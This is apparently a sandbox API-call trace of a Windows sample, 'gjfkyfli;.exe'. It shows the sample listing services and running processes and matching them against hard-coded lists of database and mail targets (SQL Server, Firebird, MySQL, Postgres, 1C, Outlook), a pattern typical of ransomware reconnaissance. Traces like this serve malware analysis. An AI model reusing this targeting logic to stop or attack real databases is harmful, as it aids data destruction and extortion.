	[0170.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0170.096] lstrlenW (lpString="ShellHWDetection") returned 16
	[0170.096] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0170.096] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0170.096] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0170.096] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0170.096] lstrlenW (lpString="Spooler") returned 7
	[0170.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0170.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0170.097] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0170.097] lstrlenW (lpString="SysMain") returned 7
	[0170.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0170.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0170.097] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0170.097] lstrlenW (lpString="Themes") returned 6
	[0170.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0170.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0170.097] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0170.097] lstrlenW (lpString="TrkWks") returned 6
	[0170.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0170.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0170.097] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0170.097] lstrlenW (lpString="UxSms") returned 5
	[0170.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0170.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0170.097] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0170.097] lstrlenW (lpString="WdiServiceHost") returned 14
	[0170.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0170.097] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0170.097] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0170.097] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0170.097] lstrlenW (lpString="WdiSystemHost") returned 13
	[0170.097] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0170.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0170.098] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0170.098] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0170.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0170.098] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0170.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0170.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0170.098] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0170.098] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0170.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0170.098] lstrlenW (lpString="Winmgmt") returned 7
	[0170.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0170.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0170.098] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0170.098] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0170.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0170.098] lstrlenW (lpString="WPDBusEnum") returned 10
	[0170.098] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0170.098] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0170.098] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0170.098] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0170.098] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0170.098] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb617698 | out: hHeap=0x7ab0000) returned 1
	[0170.098] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d8
	[0170.100] Process32FirstW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0170.101] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0170.101] lstrlenW (lpString="System") returned 6
	[0170.101] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0170.101] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0170.101] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0170.101] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0170.101] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0170.101] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0170.101] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0170.101] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0170.101] lstrlenW (lpString="smss.exe") returned 8
	[0170.101] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0170.101] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0170.101] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0170.101] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0170.101] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0170.102] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0170.102] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0170.102] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0170.102] lstrlenW (lpString="csrss.exe") returned 9
	[0170.102] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0170.102] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0170.102] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0170.102] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0170.102] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0170.102] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0170.102] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0170.102] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0170.103] lstrlenW (lpString="wininit.exe") returned 11
	[0170.103] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0170.103] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0170.103] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0170.103] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0170.103] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0170.103] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0170.103] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0170.103] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0170.103] lstrlenW (lpString="csrss.exe") returned 9
	[0170.103] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0170.103] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0170.103] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0170.103] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0170.103] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0170.103] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0170.103] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0170.104] lstrlenW (lpString="winlogon.exe") returned 12
	[0170.104] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0170.104] lstrlenW (lpString="services.exe") returned 12
	[0170.104] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0170.104] lstrlenW (lpString="lsass.exe") returned 9
	[0170.104] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0170.105] lstrlenW (lpString="lsm.exe") returned 7
	[0170.105] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.105] lstrlenW (lpString="svchost.exe") returned 11
	[0170.105] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.105] lstrlenW (lpString="svchost.exe") returned 11
	[0170.105] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.106] lstrlenW (lpString="svchost.exe") returned 11
	[0170.106] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.106] lstrlenW (lpString="svchost.exe") returned 11
	[0170.106] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.106] lstrlenW (lpString="svchost.exe") returned 11
	[0170.106] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0170.107] lstrlenW (lpString="audiodg.exe") returned 11
	[0170.107] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.107] lstrlenW (lpString="svchost.exe") returned 11
	[0170.107] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.107] lstrlenW (lpString="svchost.exe") returned 11
	[0170.108] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0170.108] lstrlenW (lpString="spoolsv.exe") returned 11
	[0170.108] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.108] lstrlenW (lpString="svchost.exe") returned 11
	[0170.108] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0170.108] lstrlenW (lpString="taskhost.exe") returned 12
	[0170.109] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0170.109] lstrlenW (lpString="dwm.exe") returned 7
	[0170.109] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0170.109] lstrlenW (lpString="explorer.exe") returned 12
	[0170.109] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0170.110] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0170.110] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0170.110] lstrlenW (lpString="reader_sl.exe") returned 13
	[0170.110] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0170.110] lstrlenW (lpString="taskhost.exe") returned 12
	[0170.110] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0170.111] lstrlenW (lpString="dllhost.exe") returned 11
	[0170.111] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0170.111] lstrlenW (lpString="dllhost.exe") returned 11
	[0170.111] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1
	[0170.111] lstrlenW (lpString="rundll32.exe") returned 12
	[0170.111] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="dinotify.exe")) returned 1
	[0170.112] lstrlenW (lpString="dinotify.exe") returned 12
	[0170.112] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0170.112] lstrlenW (lpString="dllhost.exe") returned 11
	[0170.112] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0170.112] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0170.112] Process32NextW (in: hSnapshot=0x1d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 0
	[0170.113] CloseHandle (hObject=0x1d8) returned 1
	[0170.113] Sleep (dwMilliseconds=0x1f4) 
	[0170.713] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb51c710
	[0170.713] EnumServicesStatusExW (in: hSCManager=0xb51c710, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0170.713] GetLastError () returned 0xea
	[0170.713] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0xb617698
	[0170.713] EnumServicesStatusExW (in: hSCManager=0xb51c710, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb617698, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb617698, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0170.714] CloseServiceHandle (hSCObject=0xb51c710) returned 1
	[0170.714] lstrlenW (lpString="Appinfo") returned 7
	[0170.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0170.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0170.714] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0170.714] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0170.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0170.714] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0170.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0170.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0170.714] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0170.714] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0170.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0170.714] lstrlenW (lpString="AudioSrv") returned 8
	[0170.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0170.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0170.714] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0170.714] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0170.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0170.715] lstrlenW (lpString="BFE") returned 3
	[0170.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0170.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0170.715] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0170.715] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0170.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0170.715] lstrlenW (lpString="CryptSvc") returned 8
	[0170.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0170.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0170.715] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0170.715] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0170.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0170.715] lstrlenW (lpString="CscService") returned 10
	[0170.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0170.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0170.715] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0170.715] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0170.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0170.715] lstrlenW (lpString="DcomLaunch") returned 10
	[0170.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0170.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0170.715] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0170.715] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0170.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0170.715] lstrlenW (lpString="Dhcp") returned 4
	[0170.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0170.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0170.715] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0170.715] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0170.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0170.715] lstrlenW (lpString="Dnscache") returned 8
	[0170.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0170.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0170.715] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0170.716] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0170.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0170.716] lstrlenW (lpString="DPS") returned 3
	[0170.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0170.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
